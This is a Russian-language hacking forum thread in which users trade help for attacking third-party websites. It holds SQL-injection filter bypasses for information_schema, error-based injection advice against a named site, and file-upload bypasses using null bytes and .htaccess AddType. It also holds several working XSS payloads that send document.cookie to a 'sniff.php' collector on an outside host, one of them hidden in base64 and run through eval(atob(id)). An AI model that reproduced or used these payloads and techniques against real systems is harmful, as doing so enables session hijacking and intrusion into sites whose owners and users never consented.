Вопросы по уязвимостям

[aspi]

Цитата:

Сообщение от Consistent

Подскажите, как обойти. Фильтруется символ _ в information_schema.columns\tables
Выдает ошибку

Error No: 1064 - MySQL error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\_schema.tables-- %'' at line 1

5.5.27-log

/*!information_schema*/.tables
/*!information_schema.tables*/

[aspi]

Цитата:

Сообщение от #Wolf#

Да, опечатался.

Код:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax

Тоже

Код:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax

Any ideas?

значит делаешь гдето ошибку

[Consistent]

aspi
Я пробовал так изначально. Не проходит, та же ошибка.

spari
No. Table with prefixes. And the prefix I do not know know can not either. I have to conclude, not to pick a table. So I have to bypass filtering. Your options do not approach me, I'm sorry. =)

[v3r7]

Цитата:

Сообщение от Untitled

v3r7,
Нормальное решение, так и должно быть. А в первом варианте не работало из-за невалидного тега:

Код:

<script src="http://127.0.0.1/my.net/14/sniff.php?cookie="+document.cookie;></script>

Но если надо именно как в первом варианте, см. в гугле по запросу "append script js". Или делайте document.write() вместе с этим тегом.

#Wolf#,
Показывайте линк.

Ок ,тогда у меня ещё вопрос. Почему решение работает в мозиле ,опере и ишаке,а в хроме отказывается, что они там такого намудрили не в курсе?что за защита от передачи куков или исполнения кода?

[v3r7]

Цитата:

Сообщение от v3r7

Ок ,тогда у меня ещё вопрос. Почему решение работает в мозиле ,опере и ишаке,а в хроме отказывается, что они там такого намудрили не в курсе?что за защита от передачи куков или исполнения кода?

Вот почему например onmouseover=window.execScript(isNaN(q="http://snif/1.php?l="+document.cookie))<ну тут я так понял просто из-за знаков,этот экзек не любит всякие там кавычки> или onmouseover=javascript:alert(); не хотят работать, а вот onmouseover=prompt(document.cookie) и " onmouseover=javascriptrompt(89789) работает безо всяких проблем... очень интересно неужели именно эти "функции" отключили как то? не фильтруются вроде никак.. однако вставка хтмл тоже не хочет работать

+++
http://victim/index.php/%22%20onmouseover=window.open%28%27http://site/sniff.php%3Fcookie=%27%2Bdocument.cookie%29%20//%20%22

Вот оно решение проблемы, не проходили плюсы и вопросы...кроме этой функции и имэйдж есть ещё варианты? мне интересно?

[Сергей Бардюр]

Встретилась на просторах рунета оригинальная бага:
http://lavart.su/examples'
Если приглядеться, то кажется возможно выполнить код, но все манипуляции к созданию собственного класса и закрытие остального php кода результата не дали.
Можно ли в данном случае выполнить php код, или это обычный баг ?

[M_script]

Цитата:

Сообщение от v3r7

Вот оно решение проблемы, не проходили плюсы и вопросы...кроме этой функции и имэйдж есть ещё варианты? мне интересно?

Зависит от конкретной ситуации. Вариантов много. Например такой:
"onmouseover="eval(atob(id))"id="KG5ldyBJbWFnZSgpK S5zcmM9Jy8vc2l0ZS9zbmlmZi5waHBceDNGY29va2llPScrZG9 jdW1lbnQuY29va2ll

Атрибут id содержит код в base64:
(new Image()).src='//site/sniff.php\x3Fcookie='+document.cookie
Символ '?' заменен на escape-последовательность '\x3F' чтобы при преобразовании в base64 не было символа '/'.

p.s.: в какой тег внедряется код и какие атрибуты есть в этом теге перед XSS?

[v3r7]

Наткнулся на вот такой вот скрипт фильтрации при загрузке файлов, кислотный нолик не работает,загрузки вида php.txt воспринимаются как текст при любых раскладах... так не катит txt.....%00.php не могу также загрузить например ".htaccess" или ".htaccess txt" чтобы в нём прописать AddType application/x-httpd-php .txt ((( вот сам скрипт:

<script type="text/javascript">
(function(){var d=document.domain;while (true){try{var A=window.parent.document.domain;break;}catch(e) {};d=d.replace(/.*?(?:\.|$)/,'');if (d.length==0) break;try{document.domain=d;}catch (e){break;}}})();window.parent.OnUploadCompleted(1 ,"","", "Invalid type specified") ;</script>

надеюсь вы предложите более эффективные варианты

[BigBear]

Столкнулся с такой скулёй, походу придётся крутить error-based но что-то косячу.

Такое чувство что функция принимает число до первого пробела а остальное отбрасывает.

Помогите с реализацией. Кстати оба параметра уязвимы. В одном из них юзается лимит скорее всего.

Код:

_ttp://cha[antigoogle]t.marria[antigoogle]geagency-nataly.net/list.php?from=1&step=3

MQ = on

[b3]

v3r7

Удалите JS код с проверкой и отправьте форму заново. В опере так можно, если нет оперы, сформировать пост и отправить через аддон hackbar в ФФ. Ну или wget/curl консольно. На крайний случай написать html форму и локально её отправить. Или ПХП скриптом на сокетах/курле.
Но я уверен там не только на JS проверка.

BigBear

Цитата:

Такое чувство что функция принимает число до первого пробела а остальное отбрасывает.

На форуме есть беспробельные варианты.